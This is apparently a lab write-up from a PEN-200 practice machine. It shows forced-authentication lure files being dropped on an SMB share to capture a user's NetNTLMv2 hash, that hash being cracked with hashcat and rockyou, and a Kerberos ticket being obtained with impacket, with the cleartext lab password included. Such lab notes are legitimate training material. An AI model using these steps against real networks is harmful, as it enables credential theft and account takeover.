Phishing

Through the Important.txt file located in the nara share of the nara.nara-security.com(192.168.209.30) host, it has been identified that the Documents directory in the nara share is a shared document folder that employees are encouraged to check regularly. This poses an excellent phishing opportunity.

┌──(kali㉿kali)-[~/…/PG_PRACTICE/nara/phishing/payload]
└─$ smbclient //nara.nara-security.com/nara -U kali -N -c 'prompt; cd Documents; mput *'          
lpcfg_do_global_parameter: WARNING: The "syslog" option is deprecated
putting file payload-(remotetemplate).docx as \Documents\payload-(remotetemplate).docx (282.1 kb/s) (average 282.1 kb/s)
putting file payload-(externalcell).xlsx as \Documents\payload-(externalcell).xlsx (93.9 kb/s) (average 206.6 kb/s)
putting file payload-(stylesheet).xml as \Documents\payload-(stylesheet).xml (2.5 kb/s) (average 146.1 kb/s)
putting file payload-(url).url as \Documents\payload-(url).url (1.0 kb/s) (average 115.0 kb/s)
putting file payload.pdf as \Documents\payload.pdf (12.6 kb/s) (average 96.6 kb/s)
putting file payload.wax as \Documents\payload.wax (0.9 kb/s) (average 81.3 kb/s)
putting file payload-(includepicture).docx as \Documents\payload-(includepicture).docx (123.2 kb/s) (average 88.4 kb/s)
putting file payload.application as \Documents\payload.application (26.5 kb/s) (average 81.4 kb/s)
putting file payload-(frameset).docx as \Documents\payload-(frameset).docx (120.3 kb/s) (average 86.6 kb/s)
putting file Autorun.inf as \Documents\Autorun.inf (1.4 kb/s) (average 79.2 kb/s)
putting file payload.lnk as \Documents\payload.lnk (34.6 kb/s) (average 75.6 kb/s)
putting file payload-(icon).url as \Documents\payload-(icon).url (1.8 kb/s) (average 70.1 kb/s)
putting file payload.htm as \Documents\payload.htm (1.3 kb/s) (average 65.2 kb/s)
putting file payload.scf as \Documents\payload.scf (1.5 kb/s) (average 61.1 kb/s)
putting file payload.rtf as \Documents\payload.rtf (1.7 kb/s) (average 57.5 kb/s)
putting file payload.jnlp as \Documents\payload.jnlp (1.8 kb/s) (average 52.2 kb/s)
putting file payload.asx as \Documents\payload.asx (2.3 kb/s) (average 49.4 kb/s)
putting file desktop.ini as \Documents\desktop.ini (0.8 kb/s) (average 46.9 kb/s)
putting file payload-(fulldocx).xml as \Documents\payload-(fulldocx).xml (339.2 kb/s) (average 89.9 kb/s)
putting file zoom-attack-instructions.txt as \Documents\zoom-attack-instructions.txt (0.6 kb/s) (average 79.2 kb/s)
putting file payload.m3u as \Documents\payload.m3u (0.5 kb/s) (average 74.6 kb/s)

Delivering all the payloads.

Inbound SMB connection captured. The authenticating user is tracy.white, who is a valid domain user.

Password Cracking

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ hashcat --show ./tracy.white.hash                              
 
5600 | NetNTLMv2 | Network Protocol
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ hashcat -a 0 -m 5600 ./tracy.white.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
TRACY.WHITE::NARASEC:aaaaaaaaaaaaaaaa:e4cbdb79bb157f0ed52b9ae83cafb158:01010000000000000083d01588eadb017775344984a44a2500000000010010004800590076007800790061006e005600030010004800590076007800790061006e005600020010004400760043005000690047006b007900040010004400760043005000690047006b007900070008000083d01588eadb010600040002000000080030003000000000000000010000000020000040b75e0a64cc790404a2229ae41285676bbaf4d3912c7f9577bc2bf816f2e4b00a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00340035002e003200340037000000000000000000:zqwj041FGX
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: TRACY.WHITE::NARASEC:aaaaaaaaaaaaaaaa:e4cbdb79bb157...000000
Time.Started.....: Tue Jul  1 15:02:56 2025 (0 secs)
Time.Estimated...: Tue Jul  1 15:02:56 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4118.7 kH/s (1.76ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2482176/14344385 (17.30%)
Rejected.........: 0/2482176 (0.00%)
Restore.Point....: 2469888/14344385 (17.22%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: zz332891 -> zozotareq100100
Hardware.Mon.#1..: Util: 33%
 
Started: Tue Jul  1 15:02:55 2025
Stopped: Tue Jul  1 15:02:58 2025

Password hash cracked for the tracy.white user; zqwj041FGX

Validation

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ impacket-getTGT NARA-SECURITY.COM/tracy.white@nara.nara-security.com -dc-ip $IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: zqwj041FGX
[*] Saving ticket in tracy.white@nara.nara-security.com.ccache

Validated against the KDC running on the DC host; nara.nara-security.com(192.168.209.30) TGT generated for the tracy.white account

InfoSec LAB

Explorer

nara_Phishing

Phishing

Password Cracking

Validation

Interactive Graph View

Table of Contents

Backlinks